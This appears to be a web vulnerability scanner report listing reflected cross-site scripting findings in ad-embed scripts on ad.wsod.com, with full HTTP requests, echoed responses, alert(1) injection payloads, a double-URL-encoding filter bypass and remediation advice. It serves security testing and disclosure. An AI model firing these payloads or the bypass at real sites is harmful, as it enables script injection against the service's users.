GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!974be"-alert(1)-"a93d2815993&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da298"-alert(1)-"52d4453bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&da298"-alert(1)-"52d4453bbd=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1683
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46172'-alert(1)-'e1abf17b2d0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:34115:1296351609:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 875
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25bb1'-alert(1)-'42f2cbb6b9e was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34115:1296351600:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 869
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325c1'-alert(1)-'2ac3f968620 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34115:1296351649:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 869
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36420'-alert(1)-'70de7b5bcbb was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:20 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:34115:1296351680:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 880
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ef8'-alert(1)-'03feb110922 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:02 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:34115:1296351662:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:02 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 880
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3 was submitted in the REST URL parameter 2. This input was echoed as fb2d8";alert(1)//41a552df8a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3/353.0.js.120x30/1296350847** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8";alert(1)//41a552df8a3/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f66b8%2522%253balert%25281%2529%252f%252f63760bb090e was submitted in the REST URL parameter 3. This input was echoed as f66b8";alert(1)//63760bb090e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8%2522%253balert%25281%2529%252f%252f63760bb090e/1296350847** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8";alert(1)//63760bb090e/1296353114**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d70'-alert(1)-'deaf3db773 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:36 GMT; path=/ Set-Cookie: i_1=33:353:23:3:0:34115:1296351635:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 870
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e381c'-alert(1)-'e8f4f7459d2 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/ Set-Cookie: i_1=33:353:812:3:0:34115:1296351622:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 875
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
5.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2902'-alert(1)-'1b81fa1f4a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:42:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:43 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34115:1296351763:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:42:43 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 872
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
